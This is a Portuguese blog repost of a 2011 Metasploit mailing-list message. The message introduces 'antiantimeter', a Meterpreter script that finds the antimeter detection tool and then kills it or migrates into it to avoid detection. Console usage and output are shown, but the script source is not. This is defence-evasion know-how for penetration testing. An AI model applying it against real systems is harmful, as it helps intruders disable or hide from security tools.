segunda-feira, 18 de abril de 2011

Teste de Invasão com Anti-Antimeterpreter

Você é pentester e seu alvo que está negando acesso via metasploit com meterpreter, devido ao antimeter?

Seu problemas acabaram!!!

Teste de Invasão com Anti-Antimeterpreter, o que saiu na lista framework@spool.metasploit.com

Hi List,

Today I was playing with antimeter (A program from hack4career.com to detect and kill meterpreter in memory). It indeed detects and kills meterpreter. One thing I noticed is that antimeter do not checks its own memory for meterpreter.

So I wrote this very small script which can be used to either kill antimeter or to migrate into it to avoid detection. I name it antiantimeter. hehe

meterpreter > run antiantimeter -k
[*] Searching for antimeter...
[*] Found antimeter process 5116...Killing
--------------------------------------------------------------------------------------------------------------------------------
meterpreter > run antiantimeter -m
[*] Searching for antimeter...
[*] Found antimeter process 2488...Migrating in it
[*] Migrated into antimeter.exe - 2488


P.S. I have borrowed code from some existing scripts. Its just a script for fun do not expect anything useful ;)

Nikhil Mittal
@nikhil_mitt


@firebitsbr

Nenhum comentário:

Postar um comentário

Observação: somente um membro deste blog pode postar um comentário.